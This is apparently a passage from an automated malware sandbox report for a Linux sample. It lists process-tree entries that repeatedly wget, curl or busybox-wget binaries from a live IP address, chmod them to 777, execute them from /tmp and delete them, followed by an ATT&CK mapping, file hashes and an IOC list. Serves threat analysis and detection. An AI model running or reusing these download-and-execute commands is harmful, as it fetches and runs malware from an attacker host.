./SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
2⤵
- Executes dropped EXE
PID:941

/bin/rm
rm SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
2⤵
PID:942

/usr/bin/wget
wget http://87.120.84.230/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
2⤵
PID:943

/usr/bin/curl
curl -O http://87.120.84.230/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:944

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
2⤵
PID:945

/bin/chmod
chmod 777 WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
2⤵
- File and Directory Permissions Modification
PID:946

/tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
./WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
2⤵
- Executes dropped EXE
PID:947

/bin/rm
rm WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
2⤵
PID:948

/usr/bin/wget
wget http://87.120.84.230/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
2⤵
PID:949

/usr/bin/curl
curl -O http://87.120.84.230/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:950

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
2⤵
PID:951

/bin/chmod
chmod 777 8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
2⤵
- File and Directory Permissions Modification
PID:952

/tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
./8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
2⤵
- Executes dropped EXE
PID:953

/bin/rm
rm 8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
2⤵
PID:954

/usr/bin/wget
wget http://87.120.84.230/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
2⤵
PID:955

/usr/bin/curl
curl -O http://87.120.84.230/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:956

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
2⤵
PID:957

/bin/chmod
chmod 777 I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
2⤵
- File and Directory Permissions Modification
PID:959

/tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
./I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
2⤵
- Executes dropped EXE
PID:960

/bin/rm
rm I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
2⤵
PID:961

/usr/bin/wget
wget http://87.120.84.230/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
2⤵
PID:962

/usr/bin/curl
curl -O http://87.120.84.230/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:963

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
2⤵
PID:964

/bin/chmod
chmod 777 A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
2⤵
- File and Directory Permissions Modification
PID:965

/tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
./A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
2⤵
- Executes dropped EXE
PID:966

/bin/rm
rm A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
2⤵
PID:967

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

1

T1222

Linux and Mac File and Directory Permissions Modification

1

T1222.002

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit

ioc	pid	process
/tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m	724	rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
/tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s	731	yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
/tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4	737	jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
/tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys	752	6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
/tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh	773	5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
/tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7	800	kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
/tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK	809	NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
/tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do	815	oieViux5SkcOflukQEESWqzwe8qoXmU0do
/tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT	829	rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
/tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq	851	I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
/tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH	863	A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
/tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb	869	SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
/tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV	875	WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
/tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA	881	8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
/tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m	887	rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
/tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s	893	yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
/tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4	899	jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
/tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7	905	kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
/tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK	911	NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
/tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do	917	oieViux5SkcOflukQEESWqzwe8qoXmU0do
/tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys	923	6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
/tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh	929	5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
/tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT	935	rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
/tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb	941	SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
/tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV	947	WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
/tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA	953	8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
/tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq	960	I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
/tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH	966	A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads